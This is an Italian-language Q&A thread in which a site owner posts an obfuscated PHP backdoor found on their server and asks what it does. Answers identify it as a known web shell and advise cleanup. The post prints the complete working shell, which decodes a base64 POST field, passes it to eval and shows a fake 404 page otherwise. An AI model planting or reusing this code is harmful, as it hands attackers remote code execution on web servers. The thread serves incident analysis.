Il codice PHP trovato è dannoso? [duplicare]

-1

Ho trovato il seguente codice sul mio sito web. Che cosa fa? È dannoso?

<?php
    @ignore_user_abort(true);
    @set_time_limit(0);
    $getherw3423 = "FFS"."W35"."25KK"."Sfj";
    $rretert454352 = "b"."".""."a"."s".""."".""."e"."".""."6"."".""."4"."_".""."".""."d"."e"."c"."o".""."".""."".""."d".""."e";
    $qwretrqt5234 = "";
    if(!empty($_POST[$getherw3423]) and strlen($_POST[$getherw3423]) > 0 and isset($_POST[$getherw3423])){
        $qwretrqt5234 = $rretert454352($_POST[$getherw3423]);
        @eval($qwretrqt5234);
    } else {
        echo "<html><head>
        <title>404 Page Not Found</title>
        </head><body>
        <h1>Not Found</h1>
        <p>The requested URL was not found.</p>
        </body></html>";
    }
?>
    
posta Chris 08.05.2015 - 16:17
fonte

3 risposte

3

Shell PHP modificata. Il compromesso è cattivo; la shell è peggio. Meglio avere backup, nuke, cambiare password, ricaricare.

Quick legwork:

La stringa "FFSW3525KKSfj" ottiene banalmente questo risultato , che è chiaramente ispirato dalla stessa base di codice (contenente tutte le basi suddivise64 riferimento). Il semplice perno da lì è "ERRORE! NON FARE NULLA!".

Che scopre che è relativo a questo , con md5 62c8486b3d05c537e5f81efec750937b , identificato come PHP.Shell.95.

Questo sito riporta lo script in associazione con l'invio di milioni di messaggi spam, Joomla è correlato ad esso associato con l'installazione di un componente chiamato mod_administrator ma il consiglio si basa molto sull'output casuale, quindi non sto collegando. Sembra correlato a questo repository github (Vanilla Ice, condizionatori). L'intervallo di tempo è corretto.

    
risposta data 08.05.2015 - 18:06
fonte
1

Questo codice analizza i dati del post codificati in base 64 e lo esegue come script.

Il mio consiglio è di ritirare immediatamente il sito interessato dal momento che tutti i dati archiviati nel file system o in qualsiasi database connesso sono a rischio. rimuovi gli utenti del database e preparati a ripulire!

Ci sono molti passaggi di ciò che dovresti fare nel caso in cui il tuo sito web venisse sfruttato. Ti suggerisco di cercare e seguire i consigli offerti.

    
risposta data 08.05.2015 - 16:51
fonte
0

È uno script semplice che accetta un argomento passato ad esso da un altro script o forse anche dall'URL, quindi lo esegue come codice php arbitrario.

Quindi è dannoso solo come lo sconosciuto casuale che l'ha installato per te o chiunque lo trovi. Chissà! Forse troverai la comodità di avere il tuo server web che esegue codice arbitrario utile.

    
risposta data 08.05.2015 - 17:01
fonte

Leggi altre domande sui tag